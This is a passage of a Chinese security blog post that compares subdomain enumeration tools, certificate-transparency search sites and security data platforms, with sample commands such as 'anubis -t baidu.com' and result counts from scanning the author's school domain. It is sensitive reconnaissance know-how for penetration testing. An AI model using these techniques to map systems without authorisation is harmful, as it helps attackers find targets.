15px;color: rgb(73, 68, 68);">枚举的同时，整理来自各种来源的数据，包括HackerTarget，DNSDumpster，x509 certs，VirusTotal，Google，Pkey和NetCraft。<br/>获得baidu.com的子域名：anubis -t baidu.com<br/>获得子域名的同时并获得对应ip：anubis -t baidu.com -ip<br/>获得子域名并导出：anubis -t baidu.com -o 1.txt<br/>详细usage见github介绍。<br/>使用Anubis对我校域名进行检测和枚举可得到101个结果。<br/></span><span style="font-size: 15px;color: rgb(0, 122, 170);"><a href="https://github.com/jonluca/Anubis" target="_blank">https://github.com/jonluca/Anubis</a></span><img class="" data-copyright="0" data-ratio="0.9863429438543247" data-s="300,640" style="" data-type="png" data-w="659" src="https://wechat2rss.xlab.app/img-proxy/?k=e1be4ced&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0V55pUNwDwWGcrF9cic5xppge7iar8vSs2jHReq77Ud0g10zm5XoF7jY2BB0FTqPnxUDmzFeU9n2Lw%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);"></span><br/></p><pre style="font-family: Consolas,Inconsolata,Courier,monospace;font-size: 1em;line-height: 1.2em;margin: 1.2em 0px;"><code style="font-size: 0.85em;font-family: Consolas,Inconsolata,Courier,monospace;margin: 0px 0.15em;background-color: rgb(248, 248, 248);white-space: pre;overflow: auto;border-radius: 3px;border-width: 1px;border-style: solid;border-color: rgb(204, 204, 204);-moz-border-top-colors: none;-moz-border-right-colors: none;-moz-border-bottom-colors: none;-moz-border-left-colors: none;padding: 0.5em 0.7em;display: block !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">2. AQUATONE</span></code></pre><p><span style="font-size: 15px;color: rgb(73, 68, 68);">将故障预置DNS服务器设置为Google的公共DNS服务器对测试域名进行枚举：<br/>Aquatone-discover —domain baidu.com —fallback-nameservers 8.8.8.8<br/>最终可以得到测试域名的224个结果，综合来看个人觉得该工具在子域名枚举工具当中属于比较强大的一款。<br/></span><span style="font-size: 15px;color: rgb(0, 122, 170);"><a href="https://github.com/michenriksen/aquatone" target="_blank">https://github.com/michenriksen/aquatone</a></span><img class="" data-copyright="0" data-ratio="1.2365771812080537" data-s="300,640" style="" data-type="png" data-w="596" src="https://wechat2rss.xlab.app/img-proxy/?k=df533b0d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0V55pUNwDwWGcrF9cic5xppBSY7giaQHLW31tsCCjQObib4FNAvSibOiaJiaUUoYAkQplMz3LibFM8YC8bw%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);"></span><br/></p><pre style="font-family: Consolas,Inconsolata,Courier,monospace;font-size: 1em;line-height: 1.2em;margin: 1.2em 0px;"><code style="font-size: 0.85em;font-family: Consolas,Inconsolata,Courier,monospace;margin: 0px 0.15em;background-color: rgb(248, 248, 248);white-space: pre;overflow: auto;border-radius: 3px;border-width: 1px;border-style: solid;border-color: rgb(204, 204, 204);-moz-border-top-colors: none;-moz-border-right-colors: none;-moz-border-bottom-colors: none;-moz-border-left-colors: none;padding: 0.5em 0.7em;display: block !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">3. Sublist3r</span></code></pre><p><span style="font-size: 15px;color: rgb(73, 68, 68);">使用参数很简单，直接“-d test.com”即可开始子域名枚举。<br/>同样是一款很受欢迎的工具，不使用爆破模式只加默认的”-d参数“就能得到测试域名的123个结果。<br/></span><span style="font-size: 15px;color: rgb(0, 122, 170);"><a href="https://github.com/aboul3la/Sublist3r" target="_blank">https://github.com/aboul3la/Sublist3r</a></span><img class="" data-copyright="0" data-ratio="0.4820457018498368" data-s="300,640" style="" data-type="png" data-w="919" src="https://wechat2rss.xlab.app/img-proxy/?k=ba399833&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0V55pUNwDwWGcrF9cic5xppiaicEx8o7rALbA6NQpbOxHGXkPcKmfptUoWVpu7fdHk13tAhuOygFibrQ%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);"></span><br/></p><pre style="font-family: Consolas,Inconsolata,Courier,monospace;font-size: 1em;line-height: 1.2em;margin: 1.2em 0px;"><code style="font-size: 0.85em;font-family: Consolas,Inconsolata,Courier,monospace;margin: 0px 0.15em;background-color: rgb(248, 248, 248);white-space: pre;overflow: auto;border-radius: 3px;border-width: 1px;border-style: solid;border-color: rgb(204, 204, 204);-moz-border-top-colors: none;-moz-border-right-colors: none;-moz-border-bottom-colors: none;-moz-border-left-colors: none;padding: 0.5em 0.7em;display: block !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">4. Wydomain</span></code></pre><p><span style="font-size: 15px;color: rgb(73, 68, 68);">使用方法直接在测试域名前加“-d”。<br/>效果也比较不错，仅普通查询模式可以得到164个结果。<br/></span><span style="font-size: 15px;color: rgb(0, 122, 170);"><a href="https://github.com/ring04h/wydomain" target="_blank">https://github.com/ring04h/wydomain</a></span><img class="" data-copyright="0" data-ratio="0.5527522935779816" data-s="300,640" style="" data-type="png" data-w="872" src="https://wechat2rss.xlab.app/img-proxy/?k=580a7590&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0V55pUNwDwWGcrF9cic5xppwABoD2e4eLnQ0Qj9wpEib6VnvDKiad2zptfribLJdveZSWF3bsAAsKkmg%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);"></span><br/></p><pre style="font-family: Consolas,Inconsolata,Courier,monospace;font-size: 1em;line-height: 1.2em;margin: 1.2em 0px;"><code style="font-size: 0.85em;font-family: Consolas,Inconsolata,Courier,monospace;margin: 0px 0.15em;background-color: rgb(248, 248, 248);white-space: pre;overflow: auto;border-radius: 3px;border-width: 1px;border-style: solid;border-color: rgb(204, 204, 204);-moz-border-top-colors: none;-moz-border-right-colors: none;-moz-border-bottom-colors: none;-moz-border-left-colors: none;padding: 0.5em 0.7em;display: block !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">5. theHarvester</span></code></pre><p><span style="font-size: 15px;color: rgb(73, 68, 68);">使用方法也是直接在域名后面添加“-d”参数，使用“-b all”参数的话工具会采用接口加上暴力破解DNS等所有手段。<br/>这款工具会通过搜索引擎等搜集域名邮箱，然后对多个数据来源进行检索。美中不足的是对于最终结果的去重和分类等做的不是很到位。最终对域名邮箱搜集结果的数量大概30几个，子域名的结果应该在150上下。<br/></span><span style="font-size: 15px;color: rgb(0, 122, 170);"><a href="https://github.com/laramies/theHarvester" target="_blank">https://github.com/laramies/theHarvester</a></span><img class="" data-copyright="0" data-ratio="0.8423707440100883" data-s="300,640" style="" data-type="png" data-w="793" src="https://wechat2rss.xlab.app/img-proxy/?k=30314d94&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0V55pUNwDwWGcrF9cic5xppLZOv5icPccia4jmBTQ2FxAn2AEp7iapwpRPfZn47I1eOGBJp6U4zjKFHg%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(0, 122, 170);"></span><br/></p><pre style="font-family: Consolas,Inconsolata,Courier,monospace;font-size: 1em;line-height: 1.2em;margin: 1.2em 0px;"><code style="font-size: 0.85em;font-family: Consolas,Inconsolata,Courier,monospace;margin: 0px 0.15em;background-color: rgb(248, 248, 248);white-space: pre;overflow: auto;border-radius: 3px;border-width: 1px;border-style: solid;border-color: rgb(204, 204, 204);-moz-border-top-colors: none;-moz-border-right-colors: none;-moz-border-bottom-colors: none;-moz-border-left-colors: none;padding: 0.5em 0.7em;display: block !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">6. Teemo</span></code></pre><p><span style="font-size: 15px;color: rgb(73, 68, 68);">主流用法，直接在脚本后面加“-d”参数，单使用搜索引擎和第三方站点模块枚举子域名。启用brute模式可以添加参数“-b”。<br/>对于搜索引擎的聚合相对其他工具来说做的可以说是比较尽善尽美，对于结果当中部分域名首字母大写去重的处理还略有瑕疵，不过240+的子域名和137个邮箱的结果已经很优秀了。个人感觉在国产的子域名枚举工具当中，算得上是很强。<br/>如果使用者补充上一些付费或者有限制接口的信息，结果数量应该会更多。<br/></span><span style="font-size: 15px;color: rgb(0, 122, 170);"><a href="https://github.com/bit4woo/teemo" target="_blank">https://github.com/bit4woo/teemo</a></span><img class="" data-copyright="0" data-ratio="0.8236686390532545" data-s="300,640" style="" data-type="png" data-w="845" src="https://wechat2rss.xlab.app/img-proxy/?k=2c82a302&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0V55pUNwDwWGcrF9cic5xppGUa6Ne7TZ7nxPgAQ0XLGkSPKapwBdhBW1hnJ863Czmkat8BoXoUq4w%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);"></span><br/></p><pre style="font-family: Consolas,Inconsolata,Courier,monospace;font-size: 1em;line-height: 1.2em;margin: 1.2em 0px;"><code style="font-size: 0.85em;font-family: Consolas,Inconsolata,Courier,monospace;margin: 0px 0.15em;background-color: rgb(248, 248, 248);white-space: pre;overflow: auto;border-radius: 3px;border-width: 1px;border-style: solid;border-color: rgb(204, 204, 204);-moz-border-top-colors: none;-moz-border-right-colors: none;-moz-border-bottom-colors: none;-moz-border-left-colors: none;padding: 0.5em 0.7em;display: block !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">7. knock</span></code></pre><p><span style="font-size: 15px;color: rgb(73, 68, 68);">使用方法：脚本后面直接跟待测试的域名。<br/>小亮点是会探测web服务环境，但是默认字典相对较少，目测对我校测试结果不会超过100个，个人认为中规中矩。<br/></span><span style="font-size: 15px;color: rgb(0, 122, 170);"><a href="https://github.com/guelfoweb/knock" target="_blank">https://github.com/guelfoweb/knock</a></span><img class="" data-copyright="0" data-ratio="0.8877805486284289" data-s="300,640" style="" data-type="png" data-w="802" src="https://wechat2rss.xlab.app/img-proxy/?k=b4453cce&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0V55pUNwDwWGcrF9cic5xppqIOm75eV1mq6Rf0QuGh2nWykLlobEA6lqLn2qak5yEeyR93VKAqvjA%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);"></span><br/></p><pre style="font-family: Consolas,Inconsolata,Courier,monospace;font-size: 1em;line-height: 1.2em;margin: 1.2em 0px;"><code style="font-size: 0.85em;font-family: Consolas,Inconsolata,Courier,monospace;margin: 0px 0.15em;background-color: rgb(248, 248, 248);white-space: pre;overflow: auto;border-radius: 3px;border-width: 1px;border-style: solid;border-color: rgb(204, 204, 204);-moz-border-top-colors: none;-moz-border-right-colors: none;-moz-border-bottom-colors: none;-moz-border-left-colors: none;padding: 0.5em 0.7em;display: block !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">8. Dnsmaper</span></code></pre><p><span style="font-size: 15px;color: rgb(73, 68, 68);">使用方法仍然是直接跟目标域名。<br/>工具比较神奇，检测完域传送漏洞、枚举子域名并获得banner，最终会把服务器地址在地图上展示出来。<br/>Emmm优点可能算是对于结果的展示效果可能会比较好一点吧，地图的展示效果git介绍页面上有，不过我个人觉得意义似乎不是很大。枚举速度也比较慢所以又没等它结束，不过看上去结果应该不会太差。<br/></span><span style="font-size: 15px;color: rgb(0, 122, 170);"><a href="https://github.com/le4f/dnsmaper" target="_blank">https://github.com/le4f/dnsmaper</a></span><img class="" data-copyright="0" data-ratio="0.6098265895953757" data-s="300,640" style="" data-type="png" data-w="1038" src="https://wechat2rss.xlab.app/img-proxy/?k=f3dd01cc&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0V55pUNwDwWGcrF9cic5xppfJiachiaPl9ux0EZrREQCc0Kq1OkTQ7fElEdzK0cIp2xUXyHIlXrqHAQ%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);"></span><br/></p><pre style="font-family: Consolas,Inconsolata,Courier,monospace;font-size: 1em;line-height: 1.2em;margin: 1.2em 0px;"><code style="font-size: 0.85em;font-family: Consolas,Inconsolata,Courier,monospace;margin: 0px 0.15em;background-color: rgb(248, 248, 248);white-space: pre;overflow: auto;border-radius: 3px;border-width: 1px;border-style: solid;border-color: rgb(204, 204, 204);-moz-border-top-colors: none;-moz-border-right-colors: none;-moz-border-bottom-colors: none;-moz-border-left-colors: none;padding: 0.5em 0.7em;display: block !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">9. SubDomainSniper</span></code></pre><p><span style="font-size: 15px;color: rgb(73, 68, 68);">新版本包含12个API和8个搜索引擎。对我校子域名的爆破，API和搜索模式得到的结果加上使用默认字典得到的结果去重后有100左右。</span><img class="" data-copyright="0" data-ratio="0.6885406464250735" data-s="300,640" style="" data-type="png" data-w="1021" src="https://wechat2rss.xlab.app/img-proxy/?k=fc2fd20e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0V55pUNwDwWGcrF9cic5xppd6P5X7xuRicV1UTXr1mTaNo1UmiaibFWlA6yWFk0IasCuicj6xdgRXUlgQ%2F640%3Fwx_fmt%3Dpng"/><img class="" data-copyright="0" data-ratio="0.8590971272229823" data-s="300,640" style="" data-type="png" data-w="731" src="https://wechat2rss.xlab.app/img-proxy/?k=7b1e59f4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0V55pUNwDwWGcrF9cic5xppjRsyKqw3dyCLp7jEEk3s7KPGZF9iceVCdamF9xDW5EKcecibCfBNq6Uw%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);"></span><br/></p><p style="margin: 0px 0px 1.2em !important;"><span style="color: rgb(0, 0, 0);"><strong><span style="font-size: 18px;">0x03 证书反向枚举</span></strong></span></p><p style="margin: 0px 0px 1.2em !important;"><em><span style="font-size: 15px;color: rgb(73, 68, 68);">互联网当中存在一个“证书透明度”项目，所有被发布的SSL证书都会被证书机构公布到日志当中，日志是公共的，每个人都可以查询各个网站的https证书信息（太深的原因我也不知道，猜想大概为了公开透明之类的吧）。既然公开可查，那么证书就可以用来反向枚举来获取目标域名的子域名，其实上面介绍的综合型工具基本也都会包含这类的接口，下面介绍常见的几种。</span></em></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);"><br/></span></p><pre style="font-family: Consolas,Inconsolata,Courier,monospace;font-size: 1em;line-height: 1.2em;margin: 1.2em 0px;"><code style="font-size: 0.85em;font-family: Consolas,Inconsolata,Courier,monospace;margin: 0px 0.15em;background-color: rgb(248, 248, 248);white-space: pre;overflow: auto;border-radius: 3px;border-width: 1px;border-style: solid;border-color: rgb(204, 204, 204);-moz-border-top-colors: none;-moz-border-right-colors: none;-moz-border-bottom-colors: none;-moz-border-left-colors: none;padding: 0.5em 0.7em;display: block !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">1. 全网443证书的集合 
</span></code></pre><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">17年7月的数据，使用Zmap，from t00ls的小手冰凉ing师傅<br/></span><span style="font-size: 15px;color: rgb(0, 122, 170);"><a href="https://github.com/cszuo/certbook" target="_blank">https://github.com/cszuo/certbook</a></span></p><pre style="font-family: Consolas,Inconsolata,Courier,monospace;font-size: 1em;line-height: 1.2em;margin: 1.2em 0px;"><code style="font-size: 0.85em;font-family: Consolas,Inconsolata,Courier,monospace;margin: 0px 0.15em;background-color: rgb(248, 248, 248);white-space: pre;overflow: auto;border-radius: 3px;border-width: 1px;border-style: solid;border-color: rgb(204, 204, 204);-moz-border-top-colors: none;-moz-border-right-colors: none;-moz-border-bottom-colors: none;-moz-border-left-colors: none;padding: 0.5em 0.7em;display: block !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">2. crt.sh</span></code></pre><p><span style="font-size: 15px;color: rgb(73, 68, 68);">比较经典,对大厂比较有效<br/></span><span style="font-size: 15px;color: rgb(0, 122, 170);"><a href="https://crt.sh/" target="_blank">https://crt.sh/</a></span><img class="" data-copyright="0" data-ratio="0.4967441860465116" data-s="300,640" style="" data-type="png" data-w="1075" src="https://wechat2rss.xlab.app/img-proxy/?k=bcf7ec64&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0V55pUNwDwWGcrF9cic5xppFEPia1X8cV8usFRK0WWDdQW9Cpc3EWqgJsiav0jvQ9sUCB9iaBKCKsDibA%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);"></span><br/></p><pre style="font-family: Consolas,Inconsolata,Courier,monospace;font-size: 1em;line-height: 1.2em;margin: 1.2em 0px;"><code style="font-size: 0.85em;font-family: Consolas,Inconsolata,Courier,monospace;margin: 0px 0.15em;background-color: rgb(248, 248, 248);white-space: pre;overflow: auto;border-radius: 3px;border-width: 1px;border-style: solid;border-color: rgb(204, 204, 204);-moz-border-top-colors: none;-moz-border-right-colors: none;-moz-border-bottom-colors: none;-moz-border-left-colors: none;padding: 0.5em 0.7em;display: block !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">3. Censys</span></code></pre><p><span style="font-size: 15px;color: rgb(0, 122, 170);"><a href="https://www.censys.io/" target="_blank">https://www.censys.io/</a></span><img class="" data-copyright="0" data-ratio="0.6842737094837935" data-s="300,640" style="" data-type="png" data-w="833" src="https://wechat2rss.xlab.app/img-proxy/?k=1b588028&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0V55pUNwDwWGcrF9cic5xppjpiazMkBkSJ2NP3XRKWUbYwQM48icYUn66OsjFMZRwvqFJH4Fh628d8g%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);"></span><br/></p><pre style="font-family: Consolas,Inconsolata,Courier,monospace;font-size: 1em;line-height: 1.2em;margin: 1.2em 0px;"><code style="font-size: 0.85em;font-family: Consolas,Inconsolata,Courier,monospace;margin: 0px 0.15em;background-color: rgb(248, 248, 248);white-space: pre;overflow: auto;border-radius: 3px;border-width: 1px;border-style: solid;border-color: rgb(204, 204, 204);-moz-border-top-colors: none;-moz-border-right-colors: none;-moz-border-bottom-colors: none;-moz-border-left-colors: none;padding: 0.5em 0.7em;display: block !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">4. Google的证书透明度报告项目</span></code></pre><p><span style="font-size: 15px;color: rgb(0, 122, 170);"><a href="https://transparencyreport.google.com/https/certificates" target="_blank">https://transparencyreport.google.com/https/certificates</a></span><img class="" data-copyright="0" data-ratio="0.6242774566473989" data-s="300,640" style="" data-type="png" data-w="1211" src="https://wechat2rss.xlab.app/img-proxy/?k=d0ba58e4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0V55pUNwDwWGcrF9cic5xppzpR4FaIwDhSuM2faS8d76M9Iict7jSxIXUnCDDowhyvU1iadM48xR3CA%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);"></span><br/></p><pre style="font-family: Consolas,Inconsolata,Courier,monospace;font-size: 1em;line-height: 1.2em;margin: 1.2em 0px;"><code style="font-size: 0.85em;font-family: Consolas,Inconsolata,Courier,monospace;margin: 0px 0.15em;background-color: rgb(248, 248, 248);white-space: pre;overflow: auto;border-radius: 3px;border-width: 1px;border-style: solid;border-color: rgb(204, 204, 204);-moz-border-top-colors: none;-moz-border-right-colors: none;-moz-border-bottom-colors: none;-moz-border-left-colors: none;padding: 0.5em 0.7em;display: block !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">5. GSDF</span></code></pre><p><span style="font-size: 15px;color: rgb(73, 68, 68);">一款基于Google透明度报告中的证书透明度项目的工具，只会检索ssl证书当中的结果。<br/></span><span style="font-size: 15px;color: rgb(0, 122, 170);"><a href="https://github.com/We5ter/GSDF" target="_blank">https://github.com/We5ter/GSDF</a></span><img class="" data-copyright="0" data-ratio="0.5694098088113051" data-s="300,640" style="" data-type="png" data-w="1203" src="https://wechat2rss.xlab.app/img-proxy/?k=e9b51b24&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0V55pUNwDwWGcrF9cic5xppX8xJMBVMlDtuDe0pXc78gfJ3bP0vrxVxr1w6FQSKSA4uIGkzibYa6Hg%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);"></span><br/></p><p style="margin: 0px 0px 1.2em !important;"><span style="color: rgb(0, 0, 0);font-size: 18px;"><strong>0x04 安全行业大数据平台</strong></span></p><p style="margin: 0px 0px 1.2em !important;"><em><span style="font-size: 15px;color: rgb(73, 68, 68);">还有一些安全行业数据起家并发家的大数据平台们，多数需要付费的会员身份才能获得比较理想的数据，或者干脆售卖相关的数据，往往也会集成到综合性工具当中。</span></em></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);"><br/></span></p><pre style="font-family: Consolas,Inconsolata,Courier,monospace;font-size: 1em;line-height: 1.2em;margin: 1.2em 0px;"><code style="font-size: 0.85em;font-family: Consolas,Inconsolata,Courier,monospace;margin: 0px 0.15em;background-color: rgb(248, 248, 248);white-space: pre;overflow: auto;border-radius: 3px;border-width: 1px;border-style: solid;border-color: rgb(204, 204, 204);-moz-border-top-colors: none;-moz-border-right-colors: none;-moz-border-bottom-colors: none;-moz-border-left-colors: none;padding: 0.5em 0.7em;display: block !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">1. RISKIQ</span></code></pre><p><span style="font-size: 15px;color: rgb(73, 68, 68);">首推RISKIQ，强的一批，本文ACE。<br/>支持导出和直接copy，注册为free用户可以使用很多功能，诚意满满，我校域名测试可获得365个子域。<br/></span><span style="font-size: 15px;color: rgb(0, 122, 170);"><a href="https://community.riskiq.com/" target="_blank">https://community.riskiq.com/</a></span><img class="" data-copyright="0" data-ratio="0.4597441685477803" data-s="300,640" style="" data-type="png" data-w="1329" src="https://wechat2rss.xlab.app/img-proxy/?k=12827d42&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0V55pUNwDwWGcrF9cic5xppIEia0sdmvUfDDgQMLMQibBbmO8YYPmc8wtJ97h4R5iaTsHrDb1icdJVmPg%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);"></span><br/></p><pre style="font-family: Consolas,Inconsolata,Courier,monospace;font-size: 1em;line-height: 1.2em;margin: 1.2em 0px;"><code style="font-size: 0.85em;font-family: Consolas,Inconsolata,Courier,monospace;margin: 0px 0.15em;background-color: rgb(248, 248, 248);white-space: pre;overflow: auto;border-radius: 3px;border-width: 1px;border-style: solid;border-color: rgb(204, 204, 204);-moz-border-top-colors: none;-moz-border-right-colors: none;-moz-border-bottom-colors: none;-moz-border-left-colors: none;padding: 0.5em 0.7em;display: block !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">2. SHODAN</span></code></pre><p><span style="font-size: 15px;color: rgb(0, 122, 170);"><a href="https://www.shodan.io" target="_blank">https://www.shodan.io</a></span><img class="" data-copyright="0" data-ratio="0.5977710233029382" data-s="300,640" style="" data-type="png" data-w="987" src="https://wechat2rss.xlab.app/img-proxy/?k=7501852b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0V55pUNwDwWGcrF9cic5xppjcMIQ9q7kUGzYREr5WV1cRRBPZBWOPKNxiadaLsicJpWwb5cJqLYmibVg%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);"></span><br/></p><pre style="font-family: Consolas,Inconsolata,Courier,monospace;font-size: 1em;line-height: 1.2em;margin: 1.2em 0px;"><code style="font-size: 0.85em;font-family: Consolas,Inconsolata,Courier,monospace;margin: 0px 0.15em;background-color: rgb(248, 248, 248);white-space: pre;overflow: auto;border-radius: 3px;border-width: 1px;border-style: solid;border-color: rgb(204, 204, 204);-moz-border-top-colors: none;-moz-border-right-colors: none;-moz-border-bottom-colors: none;-moz-border-left-colors: none;padding: 0.5em 0.7em;display: block !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">3. FOFA</span></code></pre><p><span style="font-size: 15px;color: rgb(0, 122, 170);"><a href="https://fofa.so/" target="_blank">https://fofa.so/</a></span><img class="" data-copyright="0" data-ratio="0.584771573604061" data-s="300,640" style="" data-type="png" data-w="985" src="https://wechat2rss.xlab.app/img-proxy/?k=bc294839&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0V55pUNwDwWGcrF9cic5xppYhONyvDiawdQpmmHXd6zx8rIOY8TZKKfn4LquFzrv6prWnQcuhT8frg%2F640%3Fwx_fmt%3Dpng"/></p><p><br/></p><pre style="font-family: Consolas,Inconsolata,Courier,monospace;font-size: 1em;line-height: 1.2em;margin: 1.2em 0px;"><code style="font-size: 0.85em;font-family: Consolas,Inconsolata,Courier,monospace;margin: 0px 0.15em;background-color: rgb(248, 248, 248);white-space: pre;overflow: auto;border-radius: 3px;border-width: 1px;border-style: solid;border-color: rgb(204, 204, 204);-moz-border-top-colors: none;-moz-border-right-colors: none;-moz-border-bottom-colors: none;-moz-border-left-colors: none;padding: 0.5em 0.7em;display: block !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">4. Zoomeye</span></code></pre><p><span style="font-size: 15px;color: rgb(0, 122, 170);"><a href="https://www.zoomeye.org/" target="_blank">https://www.zoomeye.org/</a></span><img class="" data-copyright="0" data-ratio="0.5727788279773157" data-s="300,640" style="" data-type="png" data-w="1058" src="https://wechat2rss.xlab.app/img-proxy/?k=7a20eb12&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0V55pUNwDwWGcrF9cic5xppFNs05cibpMk9C3Bk2fKbpwYCnnvW7OEN5K4L2hcQzDZm2IiaQURMibAvg%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);"></span><br/></p><pre style="font-family: Consolas,Inconsolata,Courier,monospace;font-size: 1em;line-height: 1.2em;margin: 1.2em 0px;"><code style="font-size: 0.85em;font-family: Consolas,Inconsolata,Courier,monospace;margin: 0px 0.15em;background-color: rgb(248, 248, 248);white-space: pre;overflow: auto;border-radius: 3px;border-width: 1px;border-style: solid;border-color: rgb(204, 204, 204);-moz-border-top-colors: none;-moz-border-right-colors: none;-moz-border-bottom-colors: none;-moz-border-left-colors: none;padding: 0.5em 0.7em;display: block !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">5. 微步在线</span></code></pre><p><span style="font-size: 15px;color: rgb(73, 68, 68);">恕我直言我对它这373的结果的真实性抱有怀疑态度，因为可见结果当中数据质量并一般般<br/></span><span style="font-size: 15px;color: rgb(0, 122, 170);"><a href="https://x.threatbook.cn/" target="_blank">https://x.threatbook.cn/</a></span><img class="" data-copyright="0" data-ratio="0.5959731543624162" data-s="300,640" style="" data-type="png" data-w="745" src="https://wechat2rss.xlab.app/img-proxy/?k=1d800650&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0V55pUNwDwWGcrF9cic5xppcib43Hy0BFyPN0fjW5ZzSNBich2PRDSC8ibulYtIy5n5vvLkVNKWicTQHw%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);"></span><br/></p><pre style="font-family: Consolas,Inconsolata,Courier,monospace;font-size: 1em;line-height: 1.2em;margin: 1.2em 0px;"><code style="font-size: 0.85em;font-family: Consolas,Inconsolata,Courier,monospace;margin: 0px 0.15em;background-color: rgb(248, 248, 248);white-space: pre;overflow: auto;border-radius: 3px;border-width: 1px;border-style: solid;border-color: rgb(204, 204, 204);-moz-border-top-colors: none;-moz-border-right-colors: none;-moz-border-bottom-colors: none;-moz-border-left-colors: none;padding: 0.5em 0.7em;display: block !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">6. Dnsdb</span></code></pre><p><span style="font-size: 15px;color: rgb(73, 68, 68);">开会员才能查看大部分被隐藏的结果<br/>测试域名总共得到130个结果<br/></span><span style="font-size: 15px;color: rgb(0, 122, 170);"><a href="https://dnsdb.io/" target="_blank">https://dnsdb.io/</a></span><img class="" data-copyright="0" data-ratio="0.46333853354134164" data-s="300,640" style="" data-type="png" data-w="1282" 